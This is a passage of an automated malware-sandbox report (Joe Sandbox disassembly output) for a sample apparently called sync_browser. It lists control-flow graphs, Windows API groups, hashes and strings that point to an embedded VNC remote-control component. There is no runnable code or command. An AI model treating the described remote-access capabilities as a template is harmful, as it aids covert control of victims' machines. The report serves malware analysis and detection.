7ff7d5939fbf-7ff7d5939fc2 call 7ff7d59e78d4 590->591 592 7ff7d5939f24-7ff7d5939f8d call 7ff7d59329a0 call 7ff7d5939c80 call 7ff7d593a120 590->592 591->585 600 7ff7d5939faf-7ff7d5939fb4 592->600 601 7ff7d5939f8f-7ff7d5939fa8 call 7ff7d59e85e0 592->601 600->591 602 7ff7d5939fb6-7ff7d5939fba call 7ff7d59e7914 600->602 601->600 602->591
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Service$CloseConfigEnumErrorHandleLastOpenQueryServicesStatus$Manager
                                                    • String ID:
                                                    • API String ID: 3151975580-0
                                                    • Opcode ID: a88dcc922a7d0e3135acbe79f47d9f0db8252c8db9b2e0ad08749d92f243f662
                                                    • Instruction ID: e5917003103fcf0905bd54af56d89abf61bc6610dda603cc7083c1cd9a2e5741
                                                    • Opcode Fuzzy Hash: a88dcc922a7d0e3135acbe79f47d9f0db8252c8db9b2e0ad08749d92f243f662
                                                    • Instruction Fuzzy Hash: A5916222B19A418AFB14EBB5D4147ADB7B1AF48BACFC04636EE1D17A98DF38D505C310

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 298 7ff7d5958590-7ff7d59585de call 7ff7d5933730 301 7ff7d59585e0-7ff7d59585e9 298->301 302 7ff7d595862f-7ff7d5958639 298->302 305 7ff7d59585eb-7ff7d595860e SendMessageA WaitForSingleObject 301->305 306 7ff7d5958612-7ff7d595861c 301->306 303 7ff7d595863b-7ff7d595863e 302->303 304 7ff7d5958645-7ff7d595864f 302->304 303->304 309 7ff7d595865d-7ff7d5958664 304->309 310 7ff7d5958651-7ff7d5958656 call 7ff7d59e8bf4 304->310 305->306 307 7ff7d595861e-7ff7d5958626 call 7ff7d5944110 306->307 308 7ff7d5958628 306->308 307->308 308->302 312 7ff7d595869b-7ff7d59586a5 309->312 313 7ff7d5958666-7ff7d5958688 call 7ff7d5933730 309->313 310->309 314 7ff7d59586a7-7ff7d59586ac call 7ff7d59e78d4 312->314 315 7ff7d59586b3-7ff7d59586bd 312->315 326 7ff7d595868a-7ff7d595868d 313->326 327 7ff7d5958694 313->327 314->315 319 7ff7d59586cb-7ff7d59586d5 315->319 320 7ff7d59586bf-7ff7d59586c4 call 7ff7d59e78d4 315->320 324 7ff7d59586dc-7ff7d59586e6 319->324 325 7ff7d59586d7 call 7ff7d59e78d4 319->325 320->319 330 7ff7d59586ed-7ff7d59586f7 324->330 331 7ff7d59586e8 call 7ff7d59e78d4 324->331 325->324 326->327 327->312 332 7ff7d59586fe-7ff7d5958704 330->332 333 7ff7d59586f9 call 7ff7d59e78d4 330->333 331->330 336 7ff7d5958757-7ff7d5958761 332->336 337 7ff7d5958706-7ff7d595870d 332->337 333->332 338 7ff7d5958768-7ff7d5958772 336->338 339 7ff7d5958763 call 7ff7d59e8bf4 336->339 337->336 340 7ff7d595870f-7ff7d5958719 337->340 342 7ff7d595877a-7ff7d5958782 338->342 343 7ff7d5958774-7ff7d5958779 call 7ff7d59e8bf4 338->343 339->338 344 7ff7d595871b-7ff7d5958723 340->344 345 7ff7d5958736-7ff7d595873e call 7ff7d599a220 340->345 347 7ff7d5958784-7ff7d595878b call 7ff7d59e7914 342->347 348 7ff7d5958790-7ff7d59587b3 342->348 343->342 344->336 356 7ff7d5958725-7ff7d5958734 344->356 345->336 358 7ff7d5958740-7ff7d5958751 SendMessageA 345->358 347->348 353 7ff7d59587bc-7ff7d59587dc call 7ff7d59e78d4 * 2 348->353 354 7ff7d59587b5-7ff7d59587bb FreeLibrary 348->354 363 7ff7d59587de-7ff7d59587e5 call 7ff7d59e7914 353->363 364 7ff7d59587ea-7ff7d5958896 DeleteObject call 7ff7d59e8bf4 DeleteObject call 7ff7d59e8bf4 DeleteObject call 7ff7d59e8bf4 DeleteObject call 7ff7d59e8bf4 353->364 354->353 356->336 356->345 358->336 363->364
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$Object$Delete$MessageSend$FreeLibrarySingleWait
                                                    • String ID: vncclient.cpp : deleting socket$vncclient.cpp : ~vncClient() executing...
                                                    • API String ID: 2172171234-2418058073
                                                    • Opcode ID: fd6e93333f79ed3293ab94359e9080bfa85a2ad45a32625ec314112d417f8769
                                                    • Instruction ID: aed95be0aab1dc070338c152b48ff658a38b6578661c62f7093e6a7dfdaad646
                                                    • Opcode Fuzzy Hash: fd6e93333f79ed3293ab94359e9080bfa85a2ad45a32625ec314112d417f8769
                                                    • Instruction Fuzzy Hash: 9E813832A0AA8186EB54EF65D8943BDA364FF84F98FD80132DE1D4B695CF39A455C330

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessageSend$DialogItemLongWindowmallocstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1935883720-0
                                                    • Opcode ID: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
                                                    • Instruction ID: f8a13b101384c3d9770d94c755e72048eae9ac29c41f040f026727b94de81010
                                                    • Opcode Fuzzy Hash: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
                                                    • Instruction Fuzzy Hash: 2E618F61A18A5283EB14AB29E85477EA7A1EF89FD4FD08132DE4D47B98DF3CD445C310

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$Current$CriticalSectionThread$Process$AllocDuplicateEnterExceptionHandleInitializeLeavePriorityRaiseReleaseSemaphoreValue
                                                    • String ID:
                                                    • API String ID: 772457954-0
                                                    • Opcode ID: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
                                                    • Instruction ID: 3d6e0f441e3d1817f595b027d595ec586ba7f32f0144f9ecc88174ca797d2d35
                                                    • Opcode Fuzzy Hash: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
                                                    • Instruction Fuzzy Hash: C1615C31A1871687EA44AF25A84467DBBA0FF88F88FD40036EE4D57669DF3CE049C760

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 483 7ff7d594f940-7ff7d594f979 484 7ff7d594f980-7ff7d594f9ab 483->484 485 7ff7d594fb19-7ff7d594fb25 484->485 486 7ff7d594f9b1-7ff7d594f9cc call 7ff7d59e7c50 484->486 487 7ff7d594fb29-7ff7d594fb42 call 7ff7d59e7d30 485->487 492 7ff7d594f9cf 486->492 493 7ff7d594fb44 487->493 494 7ff7d594fb50-7ff7d594fb69 call 7ff7d59e7d30 487->494 495 7ff7d594f9d1-7ff7d594f9d3 492->495 493->484 497 7ff7d594fb49-7ff7d594fb4b 494->497 503 7ff7d594fb6b-7ff7d594fb95 call 7ff7d59e8bbc 494->503 495->497 498 7ff7d594f9d9-7ff7d594f9e5 495->498 499 7ff7d594fc43-7ff7d594fc6d call 7ff7d59e7220 497->499 501 7ff7d594f9eb-7ff7d594f9f4 498->501 502 7ff7d594fae6-7ff7d594fafc SleepEx 498->502 504 7ff7d594faaa 501->504 505 7ff7d594f9fa-7ff7d594fa02 501->505 511 7ff7d594fb02-7ff7d594fb04 502->511 503->497 519 7ff7d594fb97-7ff7d594fbf8 call 7ff7d5933730 503->519 507 7ff7d594faaf-7ff7d594fab8 call 7ff7d599d1f0 504->507 505->504 509 7ff7d594fa08-7ff7d594fa0f 505->509 518 7ff7d594fabd-7ff7d594fac8 507->518 514 7ff7d594fa39-7ff7d594fa44 509->514 515 7ff7d594fa11-7ff7d594fa34 509->515 516 7ff7d594fb06-7ff7d594fb0d 511->516 517 7ff7d594fb12-7ff7d594fb14 511->517 521 7ff7d594fa5e-7ff7d594fa9e EnterCriticalSection LeaveCriticalSection 514->521 522 7ff7d594fa46-7ff7d594fa5c 514->522 520 7ff7d594faca-7ff7d594fae4 call 7ff7d599d890 515->520 516->492 517->495 518->502 518->520 532 7ff7d594fc3e 519->532 533 7ff7d594fbfa-7ff7d594fc06 519->533 520->487 520->502 528 7ff7d594faa4-7ff7d594faa8 521->528 522->528 528->507 532->499 533->532 534 7ff7d594fc08-7ff7d594fc1d 533->534 534->532 536 7ff7d594fc1f-7ff7d594fc2c 534->536 536->532 537 7ff7d594fc2e-7ff7d594fc3a 536->537 537->532
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeaveSleepsprintfswscanf
                                                    • String ID: 0.0.0.0$REP$RFB$RFB %03d.%03d$false$i$true$vncclient.cpp : m_ms_logon set to %s
                                                    • API String ID: 958158500-3765181313
                                                    • Opcode ID: 1bbc69bf7bb785b75e95c5cc589f663b48bba7a26dfe6112371c6df2dcd9451f
                                                    • Instruction ID: 2519423926eb414473290f5f23207abc93e4e61f65611f95e887f48a244636f2
                                                    • Opcode Fuzzy Hash: 1bbc69bf7bb785b75e95c5cc589f663b48bba7a26dfe6112371c6df2dcd9451f
                                                    • Instruction Fuzzy Hash: 42919F22608B8286EB649B15E448BADB7A5FB84F88FC40137DE4D43794DF3CD949C714

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$AddressCloseHandleLibraryOpenProc$CreateCurrentFirstFreeLoadMetricsProcess32SessionSnapshotSystemTokenToolhelp32
                                                    • String ID: ?
                                                    • API String ID: 2900023865-1684325040
                                                    • Opcode ID: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                    • Instruction ID: d001504c746a7ff7f6cc284ad8db7c52505d6d5792dcfc03eb5697988e5c2d9f
                                                    • Opcode Fuzzy Hash: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                    • Instruction Fuzzy Hash: E6312C3260DB8186E7609B65F44476EB7A8FBC9B84F800036DA8D47B58DF3DD055CB10

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateRect$AddressLibraryLoadProcmalloc
                                                    • String ID: SendInput$USER32$vncclient.cpp : TEST 4$vncclient.cpp : vncClient() executing...
                                                    • API String ID: 1369618222-3178290357
                                                    • Opcode ID: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
                                                    • Instruction ID: 0094b7708f6f1a47fcf9e5d3af4dc676c9fe56d2f5b3920498c582b2686934e8
                                                    • Opcode Fuzzy Hash: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
                                                    • Instruction Fuzzy Hash: BFB14A32625BE196E348CF24EA443DDBBA8F744B44F94422AE7A807B91CF796076C750

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$CriticalSectionThread$EnterExceptionLeavePriorityRaiseResume
                                                    • String ID:
                                                    • API String ID: 1366308849-0
                                                    • Opcode ID: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                    • Instruction ID: 2c102bcbaf7b0ee45c0186c445c4eeb59445ac45d8e4ec3f80fdfe074e6b080d
                                                    • Opcode Fuzzy Hash: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                    • Instruction Fuzzy Hash: DE313A26A0865387EB14AF64E4445BDB7A1FF85B58FD0013BEA4D43AA9DF3CD449CB20

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: setsockopt$ConnectionIoctlStatsgetpeernamegetsockname
                                                    • String ID:
                                                    • API String ID: 2120259006-0
                                                    • Opcode ID: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                    • Instruction ID: 908624c5de7b9e9abd4e1c7e2f9cf3ac379a515399f290170e077263e754ad23
                                                    • Opcode Fuzzy Hash: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                    • Instruction Fuzzy Hash: F8512672604B81DFE724DF34D4846ADB7A4FB8870CF804526EB5C87A48DB78D6A5CB60

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
                                                    • String ID:
                                                    • API String ID: 3283625137-0
                                                    • Opcode ID: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                    • Instruction ID: 598a0f8867108aef951f2836ab747d6f0fa6bd07c18c56e9d2a3cac99a456a88
                                                    • Opcode Fuzzy Hash: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                    • Instruction Fuzzy Hash: 4A219221A0878187EA14BB65A9412BDF2A4BF84F94FD44136EE5D037D6CF3CE4518710

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ComputerLibraryLoadName
                                                    • String ID: RICHED32.DLL$Rich Edit Dll Loading$Unable to load the Rich Edit (RICHED32.DLL) control!
                                                    • API String ID: 2278097360-3189507618
                                                    • Opcode ID: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
                                                    • Instruction ID: d8d3fd6d82d751c09d83a60ac676e72dba4883785599fa26bd85998bd9dc33af
                                                    • Opcode Fuzzy Hash: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
